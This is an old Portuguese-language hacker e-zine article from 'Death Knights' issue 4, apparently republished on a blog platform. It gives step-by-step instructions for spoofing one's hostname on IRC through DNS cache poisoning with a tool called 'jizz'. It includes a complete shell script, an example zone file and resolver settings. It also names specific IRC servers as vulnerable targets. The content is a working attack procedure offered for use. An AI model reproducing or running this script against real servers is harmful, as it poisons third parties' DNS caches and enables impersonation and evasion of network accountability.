Como spoofar localmente

Death Knights Issue 4

eZine lover (@eZine)

Published in 

Death Knights

 · 2 years ago

by BK

Hi d0oDz!
bom... pra criancada que sempre quis spoofar e nao tem shell pra isso, e' simples .. basta seguir esses passos:

(no final colocarei um exemplo de tudo)

1. Va na ml.org ou dyndns.com e crie um dominio dinamico pra voce
2. Pegue o jizz (se vc nao achar nao tem problema.. to mandando junto com a TDK).
   
3. Configure e rode o named na sua maquina.
   
4. Agora a parte mais dificil, consiga com alguem que tem shell ou entao algum lugar que forneca NS free (procure q vc acha) e coloque IN NS com seu dominio dinamico.
   
5. Agora configure seu database (do named da sua maquina)
   
6. Depois de tudo configurado e funcionando, kille seu named e execute este script
   

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- 
#!/bin/sh 
#Script por ][MoSCa][ - BrasNET 
HOST=$RANDOM 
NSDOMAIN=your.ns.org	#domain we control 
DEVICE=ppp0		#name of device we want to use 
MEUIP=$1 

if [ $# -ne '3' ]; then 
        echo "usage: $0 <Ip> <Spoof> <Irc Server>" 
        exit 
fi 

killall jizz 
sleep 1 

jizz $HOST.$NSDOMAIN $NSDOMAIN $MEUIP $NSDOMAIN $MEUIP $2 & 
nslookup <<END > /dev/null 2> /dev/null 
server $3 
set q=soa 
$HOST.$NSDOMAIN 
exit 
END 
RESULT=`nslookup $MEUIP $3 | grep Name | cut -d ":" -f2` 
echo 
echo -= $RESULT IN A $MEUIP =- 
echo 
sleep 1 
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Como usar:

bash# script <seu.ip> <seu.spoof> <irc.server>

(o jizz deve estar no mesmo diretorio q este script)

exemplo de database

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- 
@               IN      SOA     your.ns.org. root.your.ns.org. ( 
                                980131170       ; Serial 
                                300             ; Refresh 
                                120             ; Retry 
                                660             ; Expire 
                                600)            ; TTL 
                IN      NS      seu.dominio-dinamico.org. 

www             IN      A   200.200.200.200 
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

no /etc/resolv.conf nao use 127.0.0.1 como nameserver pois apartir da hora q vc killar o named nao vai resolver mais nada na sua maquina entao coloque por exemplo:

domain convex.com.br 
nameserver 200.210.55.241

tudo certo, so tentar.
PS: Irc Server com Vulnerabilidade no Bind (eu acho q ainda funciona)

BrasNET 
irc.certto.com.br 

BrasIRC 
irc.eribeiro.com.br

bom, e' isso... se nao entendeu leia de novo, leia outros documentos ou qualquer outra coisa, menos ficar me mandando PVT no IRC

cYa d0oDz!

Bloody Killer               bk@deathknights.com 
`'`'`'`'`'`'`               `'`'`'`'`'`'`'`'`'`